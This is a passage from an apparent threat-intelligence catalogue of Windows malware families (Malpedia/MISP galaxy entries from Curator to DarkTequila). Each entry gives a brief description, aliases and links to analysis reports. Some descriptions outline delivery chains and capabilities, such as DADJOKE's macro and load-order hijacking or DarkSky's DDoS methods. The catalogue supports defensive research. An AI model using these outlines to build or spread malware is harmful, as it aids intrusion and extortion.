https://www.ic3.gov/Media/News/2021/211203-2.pdf

https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3

https://id-ransomware.blogspot.com/2019/12/cuba-ransomware.html

https://www.mcafee.com/enterprise/en-us/assets/reports/rp-cuba-ransomware.pdf

https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-cuba-ransomware/

https://lab52.io/blog/cuba-ransomware-analysis/

https://securelist.com/cuba-ransomware/110533/

https://www.elastic.co/security-labs/cuba-ransomware-malware-analysis

https://www.trendmicro.com/en_us/research/22/f/cuba-ransomware-group-s-new-variant-found-using-optimized-infect.html

https://www.cisa.gov/uscert/sites/default/files/publications/aa22-335a-stopransomware-cuba-ransomware.pdf

https://www.guidepointsecurity.com/blog/using-hindsight-to-close-a-cuba-cold-case/

https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf

https://www.quorumcyber.com/threat-actors/scattered-spider-threat-actor-profile/

Curator

Profero describes this as a ransomware family that uses CryptoPP as its cryptographic library, encrypting files with the Salsa20 algorithm and protecting the encryption keys with RSA-2048.

The tag is: misp-galaxy:malpedia="Curator"

Curator is also known as:

  • Ever101

  • SunnyDay

Table 3266. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.curator

https://www.sentinelone.com/labs/custom-branded-ransomware-the-vice-society-group-and-the-threat-of-outsourced-development/

https://shared-public-reports.s3.eu-west-1.amazonaws.com/Secrets_behind_the_mysterious_ever101_ransomware.pdf

https://seguranca-informatica.pt/analysis-of-the-sunnyday-ransomware/

Cursed Murderer

Ransomware.

The tag is: misp-galaxy:malpedia="Cursed Murderer"

Cursed Murderer is also known as:

Table 3267. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cursed_murderer

https://id-ransomware.blogspot.com/2020/01/thecursedmurderer-ransomware.html

CustomerLoader

CustomerLoader is a .Net-based loader that drops more than 40 different malware families. It appeared in June 2023 and is being distributed via phishing, YouTube videos and malicious websites.

The tag is: misp-galaxy:malpedia="CustomerLoader"

CustomerLoader is also known as:

Table 3268. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.customerloader

https://blog.sekoia.io/customerloader-a-new-malware-distributing-a-wide-variety-of-payloads/#h-c2-servers

https://inside.harfanglab.io/blog/articles/cyber-threat-intelligence/loader-galore-taskloader-at-the-start-of-a-pay-per-install-infection-chain/

CyberSplitter

The tag is: misp-galaxy:malpedia="CyberSplitter"

CyberSplitter is also known as:

Table 3272. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cyber_splitter

CycBot

The tag is: misp-galaxy:malpedia="CycBot"

CycBot is also known as:

Table 3273. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cycbot

https://www.welivesecurity.com/2011/07/14/cycbot-ready-to-ride/

Cyrat

According to gdatasoftware, Cyrat ransomware uses Fernet to encrypt files. This is a symmetric encryption method meant for small data files that fit into RAM. While Fernet is not unusual itself, it is not common for ransomware and in this case even problematic.

The tag is: misp-galaxy:malpedia="Cyrat"

Cyrat is also known as:

Table 3274. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cyrat

https://id-ransomware.blogspot.com/2020/08/cyrat-ransomware.html

https://www.gdatasoftware.com/blog/cyrat-ransomware

cysxl

The tag is: misp-galaxy:malpedia="cysxl"

cysxl is also known as:

Table 3275. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cysxl

https://www.enigmasoftware.com/bkdrcysxla-removal/

Dacls (Windows)

According to PCrisk, Dacls is the name of a remote access Trojan (RAT), a malicious program that allows cyber criminals to control infected computers remotely.

Research shows that this malware is tied to Lazarus Group (a group of cyber criminals) and targets Linux and the Windows Operating System. Typically, cyber criminals use RATs to steal sensitive, confidential information, infect systems with other malware, and so on. In any case, no RAT is harmless and should be uninstalled immediately.

The tag is: misp-galaxy:malpedia="Dacls (Windows)"

Dacls (Windows) is also known as:

  • MATA

Table 3276. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dacls

https://blog.netlab.360.com/dacls-the-dual-platform-rat/

https://malwareandstuff.com/peb-where-magic-is-stored/

https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf

https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/dark-river-you-can-t-see-them-but-they-re-there/

https://securelist.com/mata-multi-platform-targeted-malware-framework/97746/

https://www.sygnia.co/mata-framework

https://securelist.com/apt-trends-report-q2-2020/97937/

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/10/18092216/Updated-MATA-attacks-Eastern-Europe_full-report_ENG.pdf

https://blogs.vmware.com/security/2022/11/threat-analysis-active-c2-discovery-using-protocol-emulation-part4-dacls-aka-mata.html

https://vblocalhost.com/uploads/VB2021-Park.pdf

DADJOKE

DADJOKE was discovered being distributed via email, targeting a South-East Asian Ministry of Defense. It is delivered as an embedded EXE file in a Word document using remote templates and a unique macro using multiple GET requests. The payload is deployed using load-order hijacking with a benign Windows Defender executable. Stage 1 has only beacon+download functionality and is made to look like a PNG file. Additional analysis by Kaspersky found 8 campaigns over 2019 and no activity prior to January 2019; DADJOKE is attributed with medium confidence to APT40.

The tag is: misp-galaxy:malpedia="DADJOKE"

DADJOKE is also known as:

Table 3277. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dadjoke

https://wemp.app/posts/80ab2b2d-4e0e-4960-94b7-4d452a06fd38?utm_source=latest-posts

https://prezi.com/view/jGyAzyy5dTOkDrtwsJi5/

https://www.youtube.com/watch?v=vx9IB88wXSE

https://twitter.com/ClearskySec/status/1110941178231484417

https://medium.com/@Sebdraven/apt-40-in-malaysia-61ed9c9642e9

https://twitter.com/a_tweeter_user/status/1154764787823316993

DanaBot

Proofpoint describes DanaBot as the latest example of malware focused on persistence and stealing useful information that can later be monetized rather than demanding an immediate ransom from victims. The social engineering in the low-volume DanaBot campaigns we have observed so far has been well-crafted, again pointing to a renewed focus on “quality over quantity” in email-based threats. DanaBot’s modular nature enables it to download additional components, increasing the flexibility and robust stealing and remote monitoring capabilities of this banker.

The tag is: misp-galaxy:malpedia="DanaBot"

DanaBot is also known as:

Table 3280. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.danabot

https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree

https://www.youtube.com/watch?v=04RsqP_P9Ss

https://malverse.it/costruiamo-un-config-extractor-per-danabot-parte-1

https://www.zscaler.com/blogs/security-research/spike-danabot-malware-activity

https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/

https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/

https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf

https://asert.arbornetworks.com/danabots-travels-a-global-perspective/

https://www.zscaler.com/blogs/security-research/danabot-launches-ddos-attack-against-ukrainian-ministry-defense

https://security-soup.net/decoding-a-danabot-downloader/

https://www.welivesecurity.com/2018/12/06/danabot-evolves-beyond-banking-trojan-new-spam/

https://assets.virustotal.com/reports/2021trends.pdf

https://securelist.com/financial-cyberthreats-in-2020/101638/

https://www.fortinet.com/blog/threat-research/breakdown-of-a-targeted-danabot-attack.html

https://www.welivesecurity.com/2018/09/21/danabot-targeting-europe-adds-new-features/

https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf

https://malwareandstuff.com/deobfuscating-danabots-api-hashing/

https://blog.yoroi.company/research/dissecting-the-danabot-paylaod-targeting-italy/

https://www.bitdefender.com/blog/hotforsecurity/popular-npm-repositories-compromised-in-man-in-the-middle-attack/

https://www.esentire.com/blog/from-darkgate-to-danabot

https://www.mandiant.com/resources/blog/detecting-disrupting-malvertising-backdoors

https://blogs.blackberry.com/en/2021/11/threat-thursday-danabot-malware-as-a-service

https://www.proofpoint.com/us/threat-insight/post/danabot-gains-popularity-and-targets-us-organizations-large-campaigns

https://www.proofpoint.com/us/threat-insight/post/danabot-new-banking-trojan-surfaces-down-under-0

https://asec.ahnlab.com/en/30445/

https://www.proofpoint.com/us/blog/threat-insight/new-year-new-version-danabot

https://www.mandiant.com/resources/supply-chain-node-js

https://twitter.com/f0wlsec/status/1459892481760411649

https://www.trustwave.com/Resources/SpiderLabs-Blog/DanaBot-Riding-Fake-MYOB-Invoice-Emails/

https://research.checkpoint.com/danabot-demands-a-ransom-payment/

https://blog.lexfo.fr/danabot-malware.html

https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/

https://www.esentire.com/blog/danabots-latest-move-deploying-icedid

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf

https://flashpoint.io/blog/danabot-version-3-what-you-need-to-know/

https://www.welivesecurity.com/2019/02/07/danabot-updated-new-cc-communication/

https://www.gdatasoftware.com/blog/2019/05/31695-strange-bits-smuggling-malware-github

https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf

https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/

https://www.cisa.gov/uscert/ncas/alerts/aa22-110a

https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf

https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware

https://news.sophos.com/en-us/2021/10/24/node-poisoning-hijacked-package-delivers-coin-miner-and-credential-stealing-backdoor

https://www.proofpoint.com/us/threat-insight/post/danabot-control-panel-revealed

https://www.zscaler.com/blogs/security-research/technical-analysis-danabot-obfuscation-techniques

danbot

Danbot is a backdoor malware that was originally written in C#. Recent versions of Danbot are written in C++. Danbot gives a remote attacker remote access features such as running cmd commands, uploading and downloading files, and moving and copying files. The backdoor commands are transmitted using either the HTTP or the DNS protocol. The commands are encapsulated in an XML file that is stored on disk. Danbot’s backdoor component picks up the XML file, then decodes and decrypts the commands.

The tag is: misp-galaxy:malpedia="danbot"

danbot is also known as:

Table 3281. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.danbot

https://dragos.com/wp-content/uploads/Dragos-Oil-and-Gas-Threat-Perspective-2019.pdf

https://www.clearskysec.com/wp-content/uploads/2021/08/Siamesekitten.pdf

https://www.secureworks.com/research/threat-profiles/cobalt-lyceum

https://www.youtube.com/watch?v=FttiysUZmDw

https://cyberx-labs.com/blog/deep-dive-into-the-lyceum-danbot-malware/

https://vblocalhost.com/uploads/VB2021-Kayal-etal.pdf

https://otx.alienvault.com/pulse/5d4301edb3f3406ac01acc0f

DarkCloud Stealer

This stealer is written in Visual Basic.

The tag is: misp-galaxy:malpedia="DarkCloud Stealer"

DarkCloud Stealer is also known as:

Table 3283. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.darkcloud

https://asec.ahnlab.com/en/53128/

https://c3rb3ru5d3d53c.github.io/malware-blog/darkcloud-stealer/

DarkComet

DarkComet is one of the most famous RATs, developed by Jean-Pierre Lesueur in 2008. After it was used in the Syrian civil war in 2011, Lesueur decided to stop developing the trojan. DarkComet provides control over a compromised system through a simple graphical user interface. Experts think that this user friendliness is the key to its mass success.

The tag is: misp-galaxy:malpedia="DarkComet"

DarkComet is also known as:

  • Breut

  • Fynloski

  • klovbot

Table 3284. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.darkcomet

https://www.sentinelone.com/labs/modifiedelephant-apt-and-a-decade-of-fabricating-evidence/

https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf

https://blog.talosintelligence.com/2022/06/avoslocker-new-arsenal.html

https://businessinsights.bitdefender.com/tech-advisory-manageengine-cve-2022-47966

https://www.sentinelone.com/wp-content/uploads/2022/02/Modified-Elephant-APT-and-a-Decade-of-Fabricating-Evidence-SentinelLabs.pdf

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/how-cybercriminals-abuse-cloud-tunneling-services

https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-1-darkcomet/

https://www.secureworks.com/research/threat-profiles/aluminum-saratoga

https://asec.ahnlab.com/wp-content/uploads/2021/11/Lazarus-%EA%B7%B8%EB%A3%B9%EC%9D%98-NukeSped-%EC%95%85%EC%84%B1%EC%BD%94%EB%93%9C-%EB%B6%84%EC%84%9D-%EB%B3%B4%EA%B3%A0%EC%84%9C.pdf

https://github.com/threatland/TL-TROJAN/tree/master/TL.RAT/RAT.Win.DarkComet

https://www.tgsoft.it/files/report/download.asp?id=7481257469

https://www.secureworks.com/research/threat-profiles/copper-fieldstone

http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html

https://content.fireeye.com/apt/rpt-apt38

https://www.sysnet.ucsd.edu/sysnet/miscpapers/darkmatter-www20.pdf

https://blog.malwarebytes.com/threat-analysis/2012/10/dark-comet-2-electric-boogaloo/

https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/

https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage

https://blog.talosintelligence.com/2022/02/threat-roundup-0204-0211.html

https://www.fireeye.com/blog/threat-research/2016/06/apt_group_sends_spea.html

https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage

DARKDEW

Mandiant associates this malware with UNC4191; it spreads to removable drives.

The tag is: misp-galaxy:malpedia="DARKDEW"

DARKDEW is also known as:

Table 3285. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.darkdew

https://www.mandiant.com/resources/blog/china-nexus-espionage-southeast-asia

https://news.sophos.com/en-us/2022/11/03/family-tree-dll-sideloading-cases-may-be-related/

DarkGate

First documented in 2018, DarkGate is a commodity loader with features that include the ability to download and execute files to memory, a Hidden Virtual Network Computing (HVNC) module, keylogging, information-stealing capabilities, and privilege escalation. DarkGate makes use of legitimate AutoIt files and typically runs multiple AutoIt scripts. New versions of DarkGate have been advertised on a Russian language eCrime forum since May 2023.

The tag is: misp-galaxy:malpedia="DarkGate"

DarkGate is also known as:

  • Meh

  • MehCrypter

Table 3287. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.darkgate

https://decoded.avast.io/janrubin/meh-2-2/

https://decoded.avast.io/janrubin/complex-obfuscation-meh/

https://www.zerofox.com/blog/the-underground-economist-volume-3-issue-12/

https://embee-research.ghost.io/practical-signatures-for-identifying-malware-with-yara/

https://www.proofpoint.com/us/blog/threat-insight/battleroyal-darkgate-cluster-spreads-email-and-fake-browser-updates

https://blog.sekoia.io/darkgate-internals/

https://www.fortinet.com/blog/threat-research/enter-the-darkgate-new-cryptocurrency-mining-and-ransomware-campaign

https://embee-research.ghost.io/decoding-a-simple-visual-basic-vbs-script-darkgate-loader/

https://www.truesec.com/hub/blog/darkgate-loader-delivered-via-teams

https://www.mandiant.com/resources/blog/detecting-disrupting-malvertising-backdoors

https://www.esentire.com/blog/from-darkgate-to-danabot

https://github.security.telekom.com/2023/08/darkgate-loader.html

https://www.netskope.com/jp/blog/new-darkgate-variant-uses-a-new-loading-approach

https://0xtoxin.github.io/threat%20breakdown/DarkGate-Camapign-Analysis/

https://securelist.com/emotet-darkgate-lokibot-crimeware-report/110286/

https://www.trellix.com/about/newsroom/stories/research/the-continued-evolution-of-the-darkgate-malware-as-a-service/

https://github.com/prodaft/malware-ioc/blob/master/PTI-66/DarkGate.md

https://x.com/embee_research/status/1736758775326146778

https://medium.com/@DCSO_CyTec/shortandmalicious-darkgate-d9102a457232

https://www.aon.com/cyber-solutions/aon_cyber_labs/darkgate-keylogger-analysis-masterofnone/

https://www.trendmicro.com/en_us/research/23/j/darkgate-opens-organizations-for-attack-via-skype-teams.html

https://github.com/telekom-security/malware_analysis/blob/main/darkgate/extractor.py

DarkLoader

The tag is: misp-galaxy:malpedia="DarkLoader"

DarkLoader is also known as:

Table 3289. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.darkloader

https://twitter.com/3xp0rtblog/status/1459081435361517585

DarkMe

The tag is: misp-galaxy:malpedia="DarkMe"

DarkMe is also known as:

Table 3290. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.darkme

http://blog.nsfocus.net/darkcasino-apt-evilnum/

DarkPink

The tag is: misp-galaxy:malpedia="DarkPink"

DarkPink is also known as:

Table 3293. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.darkpink

https://www.group-ib.com/media-center/press-releases/dark-pink-apt/

DarkPulsar

The tag is: misp-galaxy:malpedia="DarkPulsar"

DarkPulsar is also known as:

Table 3294. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.darkpulsar

https://labs.nettitude.com/blog/a-quick-analysis-of-the-latest-shadow-brokers-dump/

DarkShell

DarkShell is a DDoS bot seemingly of Chinese origin, discovered in 2011. During 2011, DarkShell was reported to target the industrial food processing industry.

The tag is: misp-galaxy:malpedia="DarkShell"

DarkShell is also known as:

Table 3296. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.darkshell

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/darkshell-ddos-botnet-evolves-with-variants/

https://www.botconf.eu/wp-content/uploads/2015/12/OK-P13-Liu-Ya-Automatically-Classify-Unknown-Bots-by-The-Register-Messages.pdf

DarkSide (Windows)

FireEye describes DARKSIDE as ransomware written in C that is configurable to target files on fixed disks, removable disks, or network shares. The malware can be customized by affiliates to create a build for specific victims.

The tag is: misp-galaxy:malpedia="DarkSide (Windows)"

DarkSide (Windows) is also known as:

  • BlackMatter

Table 3297. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.darkside

https://www.maltego.com/blog/chasing-darkside-affiliates-identifying-threat-actors-connected-to-darkside-ransomware-using-maltego-intel-471-1/

https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/

https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html

https://www.splunk.com/en_us/blog/security/the-darkside-of-the-ransomware-pipeline.html

https://www.bleepingcomputer.com/news/security/darkside-ransomware-rushes-to-cash-out-7-million-in-bitcoin/

https://blog.group-ib.com/blackmatter#

https://medium.com/s2wlab/w1-jun-en-story-of-the-week-ransomware-on-the-darkweb-af491d33868b

https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/

https://chuongdong.com/reverse%20engineering/2021/05/06/DarksideRansomware/

https://blueteamblog.com/darkside-ransomware-operations-preventions-and-detections

https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html

https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/

https://labs.bitdefender.com/2021/01/darkside-ransomware-decryption-tool/

https://news.sophos.com/en-us/2021/05/11/a-defenders-view-inside-a-darkside-ransomware-attack/

https://therecord.media/popular-hacking-forum-bans-ransomware-ads/

https://krebsonsecurity.com/2021/05/a-closer-look-at-the-darkside-ransomware-gang/

https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf

https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/

https://therecord.media/ransomware-gang-wants-to-short-the-stock-price-of-their-victims/

https://twitter.com/sysopfb/status/1422280887274639375

https://www.elliptic.co/blog/darkside-ransomware-has-netted-over-90-million-in-bitcoin

https://therecord.media/darkside-ransomware-gang-moves-some-of-its-bitcoin-after-revil-got-hit-by-law-enforcement/

https://www.mandiant.com/resources/burrowing-your-way-into-vpns

https://github.com/sisoma2/malware_analysis/tree/master/blackmatter

https://www.acronis.com/en-us/articles/darkside-ransomware/

https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3

https://asec.ahnlab.com/en/34549/

https://www.secjuice.com/blue-team-detection-darkside-ransomware/

https://www.bloomberg.com/news/articles/2021-05-13/colonial-pipeline-paid-hackers-nearly-5-million-in-ransom

https://www.advanced-intel.com/post/from-dawn-to-silent-night-darkside-ransomware-initial-attack-vector-evolution

https://www.youtube.com/watch?v=qxPXxWMI2i4

https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/

https://www.glimps.fr/lockbit3-0/

https://ghoulsec.medium.com/mal-series-13-darkside-ransomware-c13d893c36a6

https://brandefense.io/darkside-ransomware-analysis-report/

https://symantec.broadcom.com/hubfs/Attacks-Against-Critical_Infrastructrure.pdf

https://www.intel471.com/blog/darkside-ransomware-shut-down-revil-avaddon-cybercrime

https://www.hhs.gov/sites/default/files/demystifying-blackmatter.pdf

https://www.microsoft.com/security/blog/2022/04/13/dismantling-zloader-how-malicious-ads-led-to-disabled-security-tools-and-ransomware/

https://blog.360totalsecurity.com/en/darksides-targeted-ransomware-analysis-report-for-critical-u-s-infrastructure-2/

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks

https://us-cert.cisa.gov/ncas/alerts/aa21-131a

https://www.elliptic.co/blog/elliptic-follows-bitcoin-ransoms-paid-by-darkside-ransomware-victims

https://www.bleepingcomputer.com/news/security/blackmatter-ransomware-gang-rises-from-the-ashes-of-darkside-revil/

https://www.repubblica.it/economia/finanza/2021/04/28/news/un_sospetto_attacco_telematico_blocca_le_filiali_della_bcc_di_roma-298485827/

https://blog.cyble.com/2021/08/05/blackmatter-under-the-lens-an-emerging-ransomware-group-looking-for-affiliates/

https://www.trendmicro.com/en_us/research/21/e/what-we-know-about-darkside-ransomware-and-the-us-pipeline-attac.html

https://www.databreaches.net/a-chat-with-darkside/

https://www.flashpoint-intel.com/blog/darkside-ransomware-links-to-revil-difficult-to-dismiss/

https://www.technologyreview.com/2021/05/24/1025195/colonial-pipeline-ransomware-bitdefender/

https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf

https://community.riskiq.com/article/fdf74f23

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/noberus-blackcat-ransomware-ttps

https://www.metabaseq.com/recursos/inside-darkside-the-ransomware-that-attacked-colonial-pipeline#

https://github.com/Haxrein/Malware-Analysis-Reports/blob/main/darkside_ransomware_technical_analysis_report.pdf

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://zawadidone.nl/darkside-ransomware-analysis/

https://www.reuters.com/technology/colonial-pipeline-halts-all-pipeline-operations-after-cybersecurity-attack-2021-05-08/

https://therecord.media/an-interview-with-blackmatter-a-new-ransomware-group-thats-learning-from-the-mistakes-of-darkside-and-revil/

https://www.fortinet.com/blog/threat-research/newly-discovered-function-in-darkside-ransomware-variant-targets-disk-partitions

http://chuongdong.com/reverse%20engineering/2021/05/06/DarksideRansomware/

https://socprime.com/blog/affiliates-vs-hunters-fighting-the-darkside/

https://www.nozominetworks.com/blog/colonial-pipeline-ransomware-attack-revealing-how-darkside-works/

https://www.deepinstinct.com/2021/06/04/the-ransomware-conundrum-a-look-into-darkside/

https://www.crowdstrike.com/blog/falcon-protects-from-darkside-ransomware/

https://unit42.paloaltonetworks.com/darkside-ransomware/

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/are-virtual-machines-the-new-gold-for-cyber-criminals/

https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/

https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html

https://www.bleepingcomputer.com/news/security/darkside-ransomware-gang-returns-as-new-blackmatter-operation/

https://www.recordedfuture.com/blackmatter-ransomware-successor-darkside-revil/

https://www.bleepingcomputer.com/news/security/darkside-ransomware-servers-reportedly-seized-revil-restricts-targets/

https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/

https://twitter.com/embee_research/status/1678631524374020098?s=46

https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/

https://www.elliptic.co/blog/darkside-bitcoins-on-the-move-following-government-cyberattack-against-revil-ransomware-group

https://www.databreachtoday.com/blogs/darkside-ransomware-gang-launches-affiliate-program-p-2968

https://securityintelligence.com/posts/darkside-oil-pipeline-ransomware-attack/

https://www.wsj.com/articles/colonial-pipeline-ceo-tells-why-he-paid-hackers-a-4-4-million-ransom-11621435636

https://www.cybereason.com/blog/cybereason-vs-darkside-ransomware

https://www.varonis.com/blog/darkside-ransomware/

https://zetter.substack.com/p/anatomy-of-one-of-the-first-darkside

https://www.bleepingcomputer.com/news/security/darkside-ransomware-is-creating-a-secure-data-leak-service-in-iran/

https://www.crowdstrike.com/blog/how-to-defend-against-conti-darkside-revil-and-other-ransomware/

https://www.dragos.com/blog/industry-news/recommendations-following-the-colonial-pipeline-cyber-attack/

https://threatpost.com/guess-fashion-data-loss-ransomware/167754/

https://www.ic3.gov/Media/News/2021/211101.pdf

https://www.nozominetworks.com/blog/how-to-analyze-malware-for-technical-writing/

https://blog.gigamon.com/2021/05/17/tracking-darkside-and-ransomware-the-network-view/

https://go.recordedfuture.com/hubfs/reports/MTP-2021-0804.pdf

https://blog.group-ib.com/blackmatter2

https://www.bleepingcomputer.com/news/security/darkside-affiliates-claim-gangs-bitcoins-in-deposit-on-hacker-forum/

https://www.bleepingcomputer.com/news/security/popular-russian-hacking-forum-xss-bans-all-ransomware-topics/

https://blogs.keysight.com/blogs/tech/nwvs.entry.html/2021/05/18/darkside_ransomware-QfsV.html

https://twitter.com/ValthekOn/status/1422385890467491841?s=20

https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound

https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout

https://www.youtube.com/watch?v=NIiEcOryLpI

https://twitter.com/GelosSnake/status/1451465959894667275

https://www.digitalshadows.com/blog-and-research/ransomware-as-a-service-rogue-affiliates-and-whats-next/

https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion

https://www.bleepingcomputer.com/news/security/us-chemical-distributor-shares-info-on-darkside-ransomware-data-theft/

https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-2/

https://id-ransomware.blogspot.com/2020/08/darkside-ransomware.html

https://www.digitalshadows.com/blog-and-research/darkside-the-new-ransomware-group-behind-highly-targeted-attacks/

https://www.intel471.com/blog/darkside-ransomware-colonial-pipeline-attack

https://www.crowdstrike.com/blog/how-ransomware-adversaries-reacted-to-the-darkside-pipeline-attack/

https://www.secureworks.com/research/threat-profiles/gold-waterfall

https://twitter.com/JAMESWT_MHT/status/1388301138437578757

https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/

https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/

https://blogs.blackberry.com/en/2021/09/threat-thursday-blackmatter-ransomware-as-a-service

https://www.sentinelone.com/blog/meet-darkside-and-their-ransomware-sentinelone-customers-protected/

https://id-ransomware.blogspot.com/2021/07/blackmatter-ransomware.html

http://ti.dbappsecurity.com.cn/blog/index.php/2021/05/10/darkside/

https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox

https://zawadidone.nl/2020/10/05/darkside-ransomware-analysis.html

https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf

https://us-cert.cisa.gov/ncas/analysis-reports/ar21-189a

https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/

https://securityscorecard.com/blog/new-evidence-supports-assessment-that-darkside-likely-responsible-for-colonial-pipeline-ransomware-attack-others-targeted

https://www.bleepingcomputer.com/news/security/chemical-distributor-pays-44-million-to-darkside-ransomware/

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself

https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/

https://cybergeeks.tech/a-step-by-step-analysis-of-a-new-version-of-darkside-ransomware/

Darksky

DarkSky is a botnet that is capable of downloading malware, conducting a number of network and application-layer distributed denial-of-service (DDoS) attacks, and detecting and evading security controls, such as sandboxes and virtual machines. It is advertised for sale on the dark web for $20. Much of the malware that DarkSky has available to download onto targeted systems is associated with cryptocurrency-mining activity. The DDoS attacks that DarkSky can perform include DNS amplification attacks, TCP (SYN) flood, UDP flood, and HTTP flood. The botnet can also perform a check to determine whether or not the DDoS attack succeeded and turn infected systems into a SOCKS/HTTP proxy to route traffic to a remote server.

The tag is: misp-galaxy:malpedia="Darksky"

Darksky is also known as:

Table 3298. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.darksky

https://blog.radware.com/security/2018/02/darksky-botnet/

http://telegra.ph/Analiz-botneta-DarkSky-12-30

DarkTequila

Dark Tequila is a complex malicious campaign targeting Mexican users, with the primary purpose of stealing financial information, as well as login credentials to popular websites that range from code versioning repositories to public file storage accounts and domain registrars.

The tag is: misp-galaxy:malpedia="DarkTequila"

DarkTequila is also known as:

Table 3300. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.darktequila

https://securelist.com/dark-tequila-anejo/87528/

DarkTortilla

